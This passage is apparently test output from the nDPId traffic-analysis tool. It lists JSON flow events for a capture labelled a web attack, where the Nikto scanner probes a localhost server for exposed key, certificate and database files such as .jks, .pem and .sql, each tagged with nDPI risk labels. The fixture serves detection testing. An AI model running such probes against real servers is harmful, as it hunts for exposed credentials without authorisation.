00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":1,"flow_last_seen":1576420277063,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277063,"pkt":"AAAAAAAAAAAAAAAACABFAADDTFBAAEAG7+J\/AAABfwAAAcOEH5DLhXRAbe\/JloAYAED+twAAAQEICp1m\/G+dZvxvR0VUIC8xMjcuMC4wLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277063,"flow_last_seen":1576420277063,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277063,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50052,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":255,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277064,"flow_last_seen":1576420277064,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277064,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50054,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":1,"flow_last_seen":1576420277064,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277064,"pkt":"AAAAAAAAAAAAAAAACABFAADCx41AAEAGdKZ\/AAABfwAAAcOGH5Ab+v\/67hwkoIAYAED+tgAAAQEICp1m\/HCdZvxwR0VUIC8xMjcwMDEuamtzIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277064,"flow_last_seen":1576420277064,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277064,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50054,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277066,"flow_last_seen":1576420277066,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277066,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50056,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":1,"flow_last_seen":1576420277066,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277066,"pkt":"AAAAAAAAAAAAAAAACABFAADC4+FAAEAGWFJ\/AAABfwAAAcOIH5A1wtuuFoHVMYAYAED+tgAAAQEICp1m\/HGdZvxxR0VUIC8xMjcwMDEuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277066,"flow_last_seen":1576420277066,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277066,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50056,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277067,"flow_last_seen":1576420277067,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277067,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50058,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":1,"flow_last_seen":1576420277067,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277067,"pkt":"AAAAAAAAAAAAAAAACABFAADCfFhAAEAGv9t\/AAABfwAAAcOKH5CRgEQl8Paa6IAYAED+tgAAAQEICp1m\/HOdZvxzR0VUIC8wLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277067,"flow_last_seen":1576420277067,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277067,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50058,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":258,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277070,"flow_last_seen":1576420277070,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277070,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50060,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":1,"flow_last_seen":1576420277070,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277070,"pkt":"AAAAAAAAAAAAAAAACABFAADCXGdAAEAG38x\/AAABfwAAAcOMH5AiiWQXZDyqFoAYAED+tgAAAQEICp1m\/HadZvx1R0VUIC8wLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277070,"flow_last_seen":1576420277070,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277070,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50060,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":259,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277072,"flow_last_seen":1576420277072,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277072,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50062,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":1,"flow_last_seen":1576420277072,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277072,"pkt":"AAAAAAAAAAAAAAAACABFAADDQNZAAEAG+1x\/AAABfwAAAcOOH5A+53ionbjt1YAYAED+twAAAQEICp1m\/HedZvx3R0VUIC8xMjcuMC4wLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":259,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277072,"flow_last_seen":1576420277072,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277072,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50062,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277074,"flow_last_seen":1576420277074,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50064,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":1,"flow_last_seen":1576420277074,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277074,"pkt":"AAAAAAAAAAAAAAAACABFAADDdgpAAEAGxih\/AAABfwAAAcOQH5DZ8k59fiDl9oAYAED+twAAAQEICp1m\/HqdZvx6R0VUIC8xMjcuMC4wLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":260,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277074,"flow_last_seen":1576420277074,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50064,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277075,"flow_last_seen":1576420277075,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277075,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50066,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":1,"flow_last_seen":1576420277075,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277075,"pkt":"AAAAAAAAAAAAAAAACABFAAC9f6pAAEAGvI5\/AAABfwAAAcOSH5AexUfewusNb4AYAED+sQAAAQEICp1m\/HudZvx7R0VUIC8xLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277075,"flow_last_seen":1576420277075,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277075,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50066,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277077,"flow_last_seen":1576420277077,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50068,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":1,"flow_last_seen":1576420277077,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277077,"pkt":"AAAAAAAAAAAAAAAACABFAAC9i6BAAEAGsJh\/AAABfwAAAcOUH5B4uLPsGcILh4AYAED+sQAAAQEICp1m\/H2dZvx9R0VUIC8xLnNxbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277077,"flow_last_seen":1576420277077,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50068,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":263,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277078,"flow_last_seen":1576420277078,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277078,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50070,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":1,"flow_last_seen":1576420277078,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277078,"pkt":"AAAAAAAAAAAAAAAACABFAAC9VOpAAEAG505\/AAABfwAAAcOWH5Crf2yePds4BoAYAED+sQAAAQEICp1m\/H6dZvx+R0VUIC8xLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":263,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277078,"flow_last_seen":1576420277078,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277078,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50070,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":264,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277079,"flow_last_seen":1576420277079,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277079,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50072,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":1,"flow_last_seen":1576420277079,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277079,"pkt":"AAAAAAAAAAAAAAAACABFAAC9DWxAAEAGLs1\/AAABfwAAAcOYH5CSvzUdCWfTlYAYAED+sQAAAQEICp1m\/H+dZvx\/R0VUIC8xLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277079,"flow_last_seen":1576420277079,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277079,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50072,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":265,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277081,"flow_last_seen":1576420277081,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277081,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50074,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
